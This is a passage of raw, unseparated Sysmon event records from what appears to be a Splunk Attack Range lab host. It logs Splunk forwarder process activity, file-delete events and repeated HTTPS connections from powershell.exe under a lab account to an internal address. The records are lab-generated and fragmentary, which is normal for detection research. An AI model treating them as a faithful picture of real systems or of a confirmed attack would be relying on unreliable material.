Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035344129Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:08:31.138{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035344128Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:08:31.138{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035344127Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:08:31.138{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035344126Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:08:31.138{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035344125Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:08:31.138{B81B27B7-4012-611D-0500-00000000C801}420536C:\Windows\system32\csrss.exe{B81B27B7-74EF-613B-76B4-03000000C801}2900C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035344124Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:08:31.138{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-74EF-613B-76B4-03000000C801}2900C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035344123Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:08:31.134{B81B27B7-74EF-613B-76B4-03000000C801}2900C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000035344122Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:08:31.025{B81B27B7-4013-611D-2700-00000000C801}2076NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\log\splunk\metrics.log.5MD5=1A3471C30D4D021AA38D1074E0D97F88,SHA256=CCA8A58147B741C773EF80EA898A6B001C431A3D425BA89D2F40CB223390DF6A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035344154Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:08:57.717{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local52641-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 10341000x800000000000000035344153Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:08:32.369{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-74F0-613B-78B4-03000000C801}6896C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035344152Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:08:32.369{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035344151Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:08:32.369{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035344150Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:08:32.369{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035344149Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:08:32.369{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035344148Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:08:32.369{B81B27B7-4012-611D-0500-00000000C801}420536C:\Windows\system32\csrss.exe{B81B27B7-74F0-613B-78B4-03000000C801}6896C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035344147Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:08:32.369{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-74F0-613B-78B4-03000000C801}6896C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035344146Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:08:32.355{B81B27B7-74F0-613B-78B4-03000000C801}6896C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000035344145Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:08:32.216{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=857F59AAB93A7E7C3EBCFA203D6EF7F6,SHA256=44C58EE383A5DFF67724CCD99A03C975D2874842A740C76EFF71D4FDECB901E9,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035344144Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:08:32.154{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=CC58B4BBC8035A8E814D9B91560AFC92,SHA256=27A551F9E48BBFE1D12962CF9AF03ADBB33E38D63C4CDB80B8E9DCBF18421389,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035344143Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:08:32.154{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=92553ABBA6EDBC381172D7267449D5B3,SHA256=7AC36DE71A1E0D5CF97732C224841BAC2F6A0B56C15EE7B887F84EF06ACA36BC,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035344157Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:08:59.177{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local52642-false10.0.1.12-8000- 23542300x800000000000000035344156Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:08:33.369{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=CC58B4BBC8035A8E814D9B91560AFC92,SHA256=27A551F9E48BBFE1D12962CF9AF03ADBB33E38D63C4CDB80B8E9DCBF18421389,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035344155Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:08:33.236{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C27631159C510F923E617E37BDBF546B,SHA256=E9018C24017A853856B77DE297969478F081913A826FA38E92EEC637478CF128,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035344158Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:08:34.252{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0EB1E0DEC91541B9D87205D67D925A18,SHA256=832A686FC1AFA31F38ACB00ED11ACDDFB40158A98FE670933E0C786E0F5B7631,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035344160Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:08:35.933{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=20F41AB208B62DE19177A2B980D9AE71,SHA256=E08326C5A4605F4DDDE3B273337F593EDEF1893415829F94C6D948D48E43EFBC,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035344159Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:08:35.282{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2923CC480406F5A26EB594E475C27D21,SHA256=A046CC7D0EC33BAE3F0AE7B9EB7E0376D68C030872F3B9235F55E18FF86363CD,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035344162Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:09:01.722{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local52643-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035344161Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:08:36.313{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CCC454821F56B3832CFA9AD03E9ABF7F,SHA256=A6B8FA61C0E88D52004534F126B2686882075F5BC9E784B4810892A8402A9155,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035344163Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:08:37.331{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BE6FCFBFBB44448BFE63D309538AF9BC,SHA256=CBE6A59189B1A0BCB64561DD70B68EC127F73BFCB23AB9B3BC5C491629EA9318,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035344165Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:09:04.211{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local52644-false10.0.1.12-8000- 23542300x800000000000000035344164Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:08:38.348{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E8A7A545768176AFE543252BECD5C903,SHA256=CD6515FE7ECEAA0ED86041B1689E1BE35AABB67B10730868EA88A44FC4127717,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035344166Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:08:39.394{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CFA6E84C172264509840DC9494638ADA,SHA256=926DBE620160228A4BF241D97F0347E6A21C9FA692AC5DBA76810CB9589B1F9C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035344167Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:08:40.409{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9B9165341523BADF2DEB2AC2FE1E06F6,SHA256=56CA8DFD507E5DCD403A0491287301A335AB4E9BC228458BA462995B89884058,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035344169Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:08:41.762{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=309620A14CEAA8D3BCCF3EECFBE312A2,SHA256=8BD3B4FAD5193FEF876181225FFF00DF218AF653D1C297F0BA3694289575D865,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035344168Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:08:41.427{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D5285BFAA4083CF0DFCE2E5A32BCE56E,SHA256=7CCD746113B078FC23E0911B0D6AA4648C241744BB529A416A310D2F36A6477E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035344171Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:08:42.477{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=240CE8EE6F2914058F714B3CD4E3E337,SHA256=5AE7A1DAB0D59B43F62FEBF780C77E96B6FE40B993F8A79B5D063F60BA659C88,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035344170Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:09:07.733{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local52645-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035344172Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:08:43.507{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A0BFA2079640CA767B67D65631F68465,SHA256=3B1691E3C9F720105438C95A456BFA86283C48E8DEB0B7C86F56D1180F90C6F6,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035344174Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:08:44.923{B81B27B7-4012-611D-1100-00000000C801}968NT AUTHORITY\LOCAL 